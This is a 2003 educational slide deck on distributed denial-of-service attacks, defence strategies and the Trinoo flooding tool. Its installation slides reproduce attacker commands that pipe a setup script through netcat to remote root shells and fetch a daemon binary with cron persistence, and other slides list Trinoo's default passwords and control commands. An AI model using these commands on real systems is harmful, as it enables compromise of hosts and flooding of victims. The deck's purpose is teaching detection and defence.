An Introduction to DDoS

And the “Trinoo” Attack Tool

Prepared by Ray Lam, Ivan Wong

July 10, 2003

Outline

Background on DDoS Attack mechanism Ways to defend

The attack tool – Trinoo Introduction Attack scenario Symptoms and defense Weaknesses and next evolution

Background on DDoS

Attack mechanism

Denial-Of-Service

Flooding-based Send packets to victims

Network resources System resources

Traditional DOS One attacker

Distributed DOS Countless attackers

Attack Mechanism

Direct Attack

Reflector Attack

R

A

V

TCP SYN, ICMP, UDP With R’s Address as source IP address.

TCP SYN-ACK, TCP RST, ICMP, UDP..

TCP SYN-ACK, TCP RST, ICMP, UDP..

R

V

ATCP SYN, ICMP, UDP.. With V’s Address as source IP address.

Attack Architecture

V

A

Masters (handlers)

Agents (Daemons or Zombies)

TCP SYN, ICMP, UDP.. (the source IP addresses are usually spoofed)

Direct Attack

A

Masters (handlers)

Agents (Daemons or Zombies)

Reflectors

VReflector Attack

TCP SYN, ICMP, UDP.. (with V’s address as the source IP addresses)

TCP SYN-ACK, TCP RST, ICMP, UDP..

Attack Methods

Attack packets Reply packets

Smurf ICMP echo queries to broadcast address

ICMP echo replies

SYN flooding TCP SYN packets TCP SYN ACK packets

RST flooding TCP packets to closed ports TCP RST packets

ICMP flooding

ICMP queriesUDP packets to closed portsIP packets with low TTL

ICMP repliesPort unreachableTime exceeded

DNS reply flooding

DNS queries (recursive) to DNS servers

DNS replies

BackScatter Analysis (Moore et al.)

Measured DOS activity on the Internet. TCP (94+ %) UDP (2 %) ICMP (2 %)

TCP attacks based mainly on SYN flooding

Background on DDoS

Ways to defend

Strategy

Three lines of defense: Attack prevention

- before the attack Attack detection and filtering

- during the attack Attack source traceback

- during and after the attack

Attack prevention

Protect hosts from installation of masters and agents by attackers

Scan hosts for symptoms of agents being installed

Monitor network traffic for known message exchanges among attackers, masters, agents

Attack prevention

Inadequate and hard to deploy Don’t-care users leave security holes ISP and enterprise networks do not

have incentives

Attack source traceback

Identify actual origin of packet Without relying on source IP of packet 2 approaches

Routers record info of packets Routers send additional info of packets to

destination

Attack source traceback

Source traceback cannot stop ongoing DDoS attack Cannot trace origins behind firewalls,

NAT (network address translators) More to do for reflector attack (attack

packets from legitimate sources) Useful in post-attack law enforcement

Attack detection and filtering

Detection Identify DDoS attack and attack packets

Filtering Classify normal and attack packets Drop attack packets

Attack detection and filtering

Can be done in 4 places Victim’s network Victim’s ISP network Further upstream ISP network Attack source networks

Dispersed agents send packets to single victim

Like pouring packets from top of funnel

Attack detection and filtering

Victim

Attack sourcenetworks

Further upstreamISP networks

Victim’s ISP network

Victim’s network

Effectiveness of filtering

increases

Effectiveness of detection

increases

Attack detection and filtering

Detection Easy at victim’s network – large amount of

attack packets Difficult at individual agent’s network – small

amount of attack packets Filtering

Effective at agents’ networks – less likely to drop normal packets

Ineffective at victim’s network – more normal packets are dropped

D&F at agent’s network

Usually cannot detect DDoS attack Can filter attack packets with address

spoofed Attack packets in direct attacks Attack packets from agents to reflectors

in reflector attacks Ensuring all ISPs to install ingress

packet filtering is impossible

D&F at victim’s network

Detect DDoS attack Unusually high volume of incoming traffic of

certain packet types Degraded server and network performance

Filtering is ineffective Attack and normal packets have same

destination – victim’s IP and port Attack packets have source IP spoofed or come

from many different IPs Attack and normal packets indistinguishable

D&F at victim’s upstream ISP

Often requested by victim to filter attack packets

Alert protocol Victim cannot receive ACK from ISP Requires strong authentication and

encryption Filtering ineffective ISP network may also be jammed

D&F at further upstream ISP

Backpressure approach Victim detects DDoS attack Upstream ISPs filter attack packets

The attack tool – Trinoo

Introduction

Introduction

Discovered in August 1999 Daemons found on Solaris 2.x

systems Attack a system in University of

Minnesota Victim unusable for 2 days

Attack type

UDP flooding Default size of UDP packet: 1000

bytes malloc() buffer of this size and send

uninitialized content Default period of attack: 120 seconds Destination port: randomly chosen

from 0 – 65534

The attack tool – Trinoo

Attack scenario

Installation

1. Hack an account Acts as repository

Scanning tools, attack tools, Trinoo daemons, Trinoo maters, etc.

Requirements High bandwidth connection Large number of users Little administrative oversight

Installation

2. Compromise systems Look for vulnerable systems

Unpatched Sun Solaris and Linux Remote buffer overflow exploitation

Set up root account Open TCP ports

Keep a `friend list`

Installation

3. Install daemons Use “netcat” (“nc”) and “trin.sh”

netcat Network version of “cat”

trin.sh Shell script to set up daemons

./trin.sh | nc 128.aaa.167.217 1524 &

./trin.sh | nc 128.aaa.167.218 1524 &

Installation

trin.sh

echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"echo "echo rcp is done moving binary"

echo "chmod +x /usr/sbin/rpc.listen"

echo "echo launching trinoo"echo "/usr/sbin/rpc.listen"

echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"echo "crontab cron"echo "echo launched"echo "exit"

Architecture

Victim

Attacker

Masters (handlers)

Agents (Daemons or Zombies)

Direct Attack

Communication ports

Monitor specific ports to detect presence of master, agent

Attacker Master Daemon

Port 27665

TCPUDP

UDP Port 27444

Port 31335

Password protection

Password used to prevent administrators or other hackers to take control

Encrypted password compiled into master and daemon using crypt()

Clear-text password is sent over network – session is not encrypted

Received password is encrypted and compared

Password protection

Default passwords “l44adsl” – trinoo daemon password “gOrave” – trinoo master server startup “betaalmostdone” – trinoo master remote

interface password “killme” – trinoo master password to

control “mdie” command

Login to master

Telnet to port 27665 of the host with master Enter password “betaalmostdone” Warn if others try to connect the master

[root@r2 root]# telnet r1 27665Trying 192.168.249.201...Connected to r1.router (192.168.249.201).Escape character is '^]'.betaalmostdonetrinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

trinoo>

Master and daemon

Communicate by UDP packets Command line format

arg1 password arg2 Default password is “l44adsl” When daemon starts, it sends

“HELLO” to master Master maintains list of daemon

Master commands

dos IP DoS the IP address specified “aaa l44adsl IP” sent to each daemon

mdos <ip1:ip2:ip3> DoS the IPs simultaneously

mtimer N Set attack period to N seconds

Master commands

bcast List all daemons’ IP

mdie password Shutdown all daemons

killdead Invite all daemons to send “HELLO” to

master Delete all dead daemons from the list

Daemon commands

Not directly used; only used by master to send commands to daemons

Consist of 3 letters Avoid exposing the commands by using

Unix command “strings” on the binary

Daemon commands

aaa password IP DoS specified IP

bbb password N Set attack period to N seconds

rsz password N Set attack packet size to N bytes

The attack tool – Trinoo

Symptoms and defense

Symptoms

Masters Crontab

Friend list … …-b

* * * * * /usr/sbin/rpc.listen

# ls -l ... ...-b -rw------- 1 root root 25 Sep 26 14:46 ... -rw------- 1 root root 50 Sep 26 14:30 ...-b

Symptoms

Masters (Con’t) Socket status

# netstat -a --inetActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:27665 *:* LISTEN . . .udp 0 0 *:31335 *:* . . .

Symptoms

Masters (Con’t) File status

# lsof | egrep ":31335|:27665"master 1292 root 3u inet 2460 UDP *:31335 master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)

# lsof -p 1292COMMAND PID USER FD TYPE DEVICE SIZE NODE NAMEmaster 1292 root cwd DIR 3,1 1024 14356 /tmp/...master 1292 root rtd DIR 3,1 1024 2 /master 1292 root txt REG 3,1 30492 14357 /tmp/.../mastermaster 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.somaster 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so

Symptoms

Daemons Socket status

# netstat -a --inetActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State . . .udp 0 0 *:1024 *:* udp 0 0 *:27444 *:* . . .

Symptoms

Daemons (Con’t) File status

# lsof | egrep ":27444"ns 1316 root 3u inet 2502 UDP *:27444

# lsof -p 1316COMMAND PID USER FD TYPE DEVICE SIZE NODE NAMEns 1316 root cwd DIR 3,1 1024 153694 /tmp/...ns 1316 root rtd DIR 3,1 1024 2 /ns 1316 root txt REG 3,1 6156 153711 /tmp/.../nsns 1316 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.sons 1316 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.sons 1316 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so

Defenses

Prevent root level compromise Patch systems Set up firewalls Monitor traffics

Block abused ports High numbered UDP ports Trade off

Also block normal programs using the same ports

The attack tool – Trinoo

Weaknesses and next evolution

Weaknesses

Single kind of attack UDP flooding Easily defended by single defense tools

Use IP as destination address “Moving target defense” – victim changes

IP to avoid attack

Weaknesses

Password, encrypted password, commands visible in binary images Use Unix command “strings” to obtain

- strings master- strings –n3 ns

Check if Trinoo found Crack the encrypted passwords

Weaknesses

Password travels in plain text in network Daemon password frequently sent in

master-to-daemon commands Get password by “ngrep”, “tcpdump”

which show UDP payload

Uproot a Trinoo network

Locate a daemon Use “strings” to obtain IPs of masters Contact sites with master installed Those sites check list of daemons

By inspecting file “…” or get master login password and use “bcast” command

Get “mdie” password Use “mdie” to shut down all daemons “mdie” periodically as daemons restarted by

crontab

Next evolution

Combination of several attack types SYN flood, UDP flood, ICMP flood… Higher chance of successful attack

Stronger encryption of embedded strings, passwords

Use encrypted communication channel Communicate by protocol difficult to be

detected or blocked, e.g. ICMP

References

R. Chang, “Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial,” Oct. 2002

D. Dittrich, “The DoS Project’s ‘Trinoo’ Distributed Denial of Service Attack Tool,” http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999

Open Discussion